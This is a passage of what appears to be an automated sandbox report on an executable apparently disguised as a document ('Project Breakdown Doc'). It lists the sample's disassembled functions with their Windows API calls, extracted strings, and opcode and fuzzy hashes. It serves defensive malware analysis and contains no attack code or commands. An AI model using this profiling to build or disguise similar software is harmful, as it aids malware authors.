                                                  • Instruction Fuzzy Hash: 6D71FA71A04717EBD7349F79CCD1B5AB3A8AF15328F14872AF528D7281E770DA409790
                                                  Function 00CA2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CA2A31
                                                  • GetMenuItemInfoW.USER32(00D06890,000000FF,00000000,00000030), ref: 00CA2A92
                                                  • SetMenuItemInfoW.USER32(00D06890,00000004,00000000,00000030), ref: 00CA2AC8
                                                  • Sleep.KERNEL32(000001F4), ref: 00CA2ADA
                                                  • GetMenuItemCount.USER32(?), ref: 00CA2B1E
                                                  • GetMenuItemID.USER32(?,00000000), ref: 00CA2B3A
                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00CA2B64
                                                  • GetMenuItemID.USER32(?,?), ref: 00CA2BA9
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CA2BEF
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA2C03
                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA2C24
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                  • String ID:
                                                  • API String ID: 4176008265-0
                                                  • Opcode ID: 7541bd743d89b0eccad39e1a38c557e28fa64ee6f3588d2b7ead3ae0831b3383
                                                  • Instruction ID: 99a5f9945afd2b0f1f22a1ac5700d0d3969df26c7488cb2834cd78ed274310b5
                                                  • Opcode Fuzzy Hash: 7541bd743d89b0eccad39e1a38c557e28fa64ee6f3588d2b7ead3ae0831b3383
                                                  • Instruction Fuzzy Hash: 7761A47090026AAFDB21CF68DD88EBEBBB9FB0631CF140459E85297251D731AE45DB30
                                                  Function 00CC7192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CC7214
                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CC7217
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00CC723B
                                                  • _memset.LIBCMT ref: 00CC724C
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CC725E
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CC72D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$LongWindow_memset
                                                  • String ID:
                                                  • API String ID: 830647256-0
                                                  • Opcode ID: dfd3888f3415b4ec4493896978a255276d91877d12edc6968b4375c36e4d6600
                                                  • Instruction ID: c6fad2d6d315f153324469e69028172bbb5d6d0c94101e7fccd32ad5511cae8d
                                                  • Opcode Fuzzy Hash: dfd3888f3415b4ec4493896978a255276d91877d12edc6968b4375c36e4d6600
                                                  • Instruction Fuzzy Hash: 86614775A00248AFDB20DFA4CC81FEE77F8EB09710F144259FA14A72A1D774AA55DFA0
                                                  Function 00C9710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C97135
                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00C9718E
                                                  • VariantInit.OLEAUT32(?), ref: 00C971A0
                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C971C0
                                                  • VariantCopy.OLEAUT32(?,?), ref: 00C97213
                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C97227
                                                  • VariantClear.OLEAUT32(?), ref: 00C9723C
                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00C97249
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C97252
                                                  • VariantClear.OLEAUT32(?), ref: 00C97264
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C9726F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                  • String ID:
                                                  • API String ID: 2706829360-0
                                                  • Opcode ID: 036c4fe4cf1ce1fe7a19a54bd22496f1aa8ff402e8a2d2dfe2aa83cf1ea12b4e
                                                  • Instruction ID: a17047a7a6f6d4f3b08c7f2090eabda4de48f6ba1e1cba108fe73e6de2ef21c3
                                                  • Opcode Fuzzy Hash: 036c4fe4cf1ce1fe7a19a54bd22496f1aa8ff402e8a2d2dfe2aa83cf1ea12b4e
                                                  • Instruction Fuzzy Hash: D8415075910219EFCF04DF64D848EAEBBB9FF48354F008169F915A7261CB30AA46DB90
                                                  Function 00CB5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00CB5AA6
                                                  • inet_addr.WSOCK32(?,?,?), ref: 00CB5AEB
                                                  • gethostbyname.WSOCK32(?), ref: 00CB5AF7
                                                  • IcmpCreateFile.IPHLPAPI ref: 00CB5B05
                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CB5B75
                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CB5B8B
                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00CB5C00
                                                  • WSACleanup.WSOCK32 ref: 00CB5C06
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                  • String ID: Ping
                                                  • API String ID: 1028309954-2246546115
                                                  • Opcode ID: a3b1d114c1f0a500cfaede993d89579442ad2880f6672c72991a2fef4f3f54e0
                                                  • Instruction ID: e3a751844e16b5afee8624ceceae9946ba783d19ec28d2c74d91e4ee89766660
                                                  • Opcode Fuzzy Hash: a3b1d114c1f0a500cfaede993d89579442ad2880f6672c72991a2fef4f3f54e0
                                                  • Instruction Fuzzy Hash: 8C5180316047009FDB11AF25CC89B6EBBE5EF48710F148969F566DB2E1DB70E900DB42
                                                  Function 00CAB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00CAB73B
                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00CAB7B1
                                                  • GetLastError.KERNEL32 ref: 00CAB7BB
                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00CAB828
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                  • API String ID: 4194297153-14809454
                                                  • Opcode ID: 4eb403e5e958930c8a4c7e4053fd1547ea4744d2c1cff3f184909973f9ef27e3
                                                  • Instruction ID: db3538a240092bf33ad239e7144753571955fe98d09df45793883f9a4e833967
                                                  • Opcode Fuzzy Hash: 4eb403e5e958930c8a4c7e4053fd1547ea4744d2c1cff3f184909973f9ef27e3
                                                  • Instruction Fuzzy Hash: 45318035A0020A9FDB10EF68C885ABEBBB4FF86748F144029E516D72D2DBB19E42D751
                                                  Function 00C99471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                    • Part of subcall function 00C9B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C9B0E7
                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C994F6
                                                  • GetDlgCtrlID.USER32 ref: 00C99501
                                                  • GetParent.USER32 ref: 00C9951D
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C99520
                                                  • GetDlgCtrlID.USER32(?), ref: 00C99529
                                                  • GetParent.USER32(?), ref: 00C99545
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C99548
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: 0c05eb176a7d36703f03ae85b9ae47e8c27cfd43a537a3fb3da0ffcdce6f74ac
                                                  • Instruction ID: 570bfcc0926f8681d7e41fa7923ccbd03986ec0bb3da99dd1e01d0371c2fd381
                                                  • Opcode Fuzzy Hash: 0c05eb176a7d36703f03ae85b9ae47e8c27cfd43a537a3fb3da0ffcdce6f74ac
                                                  • Instruction Fuzzy Hash: 8F21C470900108BBDF05ABA4CC89EFEBB75FF49300F104229F561972E2DB759919EB20
                                                  Function 00C9955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                    • Part of subcall function 00C9B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C9B0E7
                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C995DF
                                                  • GetDlgCtrlID.USER32 ref: 00C995EA
                                                  • GetParent.USER32 ref: 00C99606
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C99609
                                                  • GetDlgCtrlID.USER32(?), ref: 00C99612
                                                  • GetParent.USER32(?), ref: 00C9962E
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C99631
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: 0cbb61cd665a226320da83d7aa712f22511b8a6184af8442f6a31e5be4a5ca14
                                                  • Instruction ID: 9efda9658859bebab936274cffd42cc36b413a0ce460e15143eb41e953234c54
                                                  • Opcode Fuzzy Hash: 0cbb61cd665a226320da83d7aa712f22511b8a6184af8442f6a31e5be4a5ca14
                                                  • Instruction Fuzzy Hash: F6219574900208BBDF05ABA4CC89FFEBB79EF58300F104159F961972A1DB759919EB20
                                                  Function 00C99645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetParent.USER32 ref: 00C99651
                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00C99666
                                                  • _wcscmp.LIBCMT ref: 00C99678
                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C996F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                  • API String ID: 1704125052-3381328864
                                                  • Opcode ID: 674d1484cf309abe60924af434e25f690e851d05b80aff6967abb8a90367b312
                                                  • Instruction ID: 63774e60ad097623c4c93d1e268b83d85b59260dbdc600f9237d73ee452daea2
                                                  • Opcode Fuzzy Hash: 674d1484cf309abe60924af434e25f690e851d05b80aff6967abb8a90367b312
                                                  • Instruction Fuzzy Hash: 8E110A7624834BBAFF512625DC4FEAA779CCF05360B20013EFA10A50E1FE716A515A59
                                                  Function 00CB8BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00CB8BEC
                                                  • CoInitialize.OLE32(00000000), ref: 00CB8C19
                                                  • CoUninitialize.OLE32 ref: 00CB8C23
                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00CB8D23
                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00CB8E50
                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00CD2C0C), ref: 00CB8E84
                                                  • CoGetObject.OLE32(?,00000000,00CD2C0C,?), ref: 00CB8EA7
                                                  • SetErrorMode.KERNEL32(00000000), ref: 00CB8EBA
                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CB8F3A
                                                  • VariantClear.OLEAUT32(?), ref: 00CB8F4A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                  • String ID:
                                                  • API String ID: 2395222682-0
                                                  • Opcode ID: 50390ea46799ea3160d494c2f3f46df04bff9289b65efe241f6c931a5ae08bad
                                                  • Instruction ID: 709c56463cf4d01457e617a762fc4d03422f7d9c9d1a6fdeac123f5b81e6ebae
                                                  • Opcode Fuzzy Hash: 50390ea46799ea3160d494c2f3f46df04bff9289b65efe241f6c931a5ae08bad
                                                  • Instruction Fuzzy Hash: 88C135B1208305AFD700DF64C884A6BB7E9FF89748F00496DF58A9B251DB31ED0ACB52
                                                  Function 00CA4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __swprintf.LIBCMT ref: 00CA419D
                                                  • __swprintf.LIBCMT ref: 00CA41AA
                                                    • Part of subcall function 00C638D8: __woutput_l.LIBCMT ref: 00C63931
                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 00CA41D4
                                                  • LoadResource.KERNEL32(?,00000000), ref: 00CA41E0
                                                  • LockResource.KERNEL32(00000000), ref: 00CA41ED
                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 00CA420D
                                                  • LoadResource.KERNEL32(?,00000000), ref: 00CA421F
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00CA422E
                                                  • LockResource.KERNEL32(?), ref: 00CA423A
                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00CA429B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                  • String ID:
                                                  • API String ID: 1433390588-0
                                                  • Opcode ID: c95a8c5d5cc47e1f40d60432befbf6164c6f6f23f9a19d2d15674ce3a60e0a5c
                                                  • Instruction ID: 9eb516c05f1d35866f8a8db18130cd8d419fc51f0f88c4ca781fd54d50255667
                                                  • Opcode Fuzzy Hash: c95a8c5d5cc47e1f40d60432befbf6164c6f6f23f9a19d2d15674ce3a60e0a5c
                                                  • Instruction Fuzzy Hash: 2C31B0B1A0120BABDB199F60DC48FBF7BADEF49305F004629F915D6150D7B0DA529BB0
                                                  Function 00CA16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 00CA1700
                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00CA0778,?,00000001), ref: 00CA1714
                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00CA171B
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CA0778,?,00000001), ref: 00CA172A
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CA173C
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CA0778,?,00000001), ref: 00CA1755
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CA0778,?,00000001), ref: 00CA1767
                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00CA0778,?,00000001), ref: 00CA17AC
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00CA0778,?,00000001), ref: 00CA17C1
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00CA0778,?,00000001), ref: 00CA17CC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                  • String ID:
                                                  • API String ID: 2156557900-0
                                                  • Opcode ID: f7e184b8db2bcc859334b11365ca015cb13e7a55c611a4b6557410a114046d0d
                                                  • Instruction ID: 600f0ebfffe58b26324f5346f910f7d858a12bce514c3f113bf865eccfb58714
                                                  • Opcode Fuzzy Hash: f7e184b8db2bcc859334b11365ca015cb13e7a55c611a4b6557410a114046d0d
                                                  • Instruction Fuzzy Hash: FE31BF75A00306BBEB119F14DC84FAD3BAAEF16755F194028FD18CA3A0D770AE408BA0
                                                  Function 00C4FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C4FC06
                                                  • OleUninitialize.OLE32(?,00000000), ref: 00C4FCA5
                                                  • UnregisterHotKey.USER32(?), ref: 00C4FDFC
                                                  • DestroyWindow.USER32(?), ref: 00C84A00
                                                  • FreeLibrary.KERNEL32(?), ref: 00C84A65
                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C84A92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                  • String ID: close all
                                                  • API String ID: 469580280-3243417748
                                                  • Opcode ID: e370d03197843ce0b62440f3eed320c3a104383e419a0bb01fa7fcb17f9ea0cc
                                                  • Instruction ID: 9c61cb368ea9b327571afddc63ade993cebe200d2a8e03eaf852cee101d3b4fd
                                                  • Opcode Fuzzy Hash: e370d03197843ce0b62440f3eed320c3a104383e419a0bb01fa7fcb17f9ea0cc
                                                  • Instruction Fuzzy Hash: 7AA14A34701212CFCB29EF14C495B69F7A5BF04704F1542ADE81AAB262DB30AE17EF58
                                                  Function 00C9A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EnumChildWindows.USER32(?,00C9AA64), ref: 00C9A9A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ChildEnumWindows
                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                  • API String ID: 3555792229-1603158881
                                                  • Opcode ID: 8341e5e44675309ab272caae1699f80e1530ad39accb1ba6c58079f68526f2a8
                                                  • Instruction ID: 681aed16f217f7a8c95f39ad223f50e51fd20345f73a64cde00467c1d9f3ca40
                                                  • Opcode Fuzzy Hash: 8341e5e44675309ab272caae1699f80e1530ad39accb1ba6c58079f68526f2a8
                                                  • Instruction Fuzzy Hash: 34919070A0060AABDF58DF60C485BEEFB74FF04304F518119E99AA7191DF306A99DBD1
                                                  Function 00C42E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00C42EAE
                                                    • Part of subcall function 00C41DB3: GetClientRect.USER32(?,?), ref: 00C41DDC
                                                    • Part of subcall function 00C41DB3: GetWindowRect.USER32(?,?), ref: 00C41E1D
                                                    • Part of subcall function 00C41DB3: ScreenToClient.USER32(?,?), ref: 00C41E45
                                                  • GetDC.USER32 ref: 00C7CF82
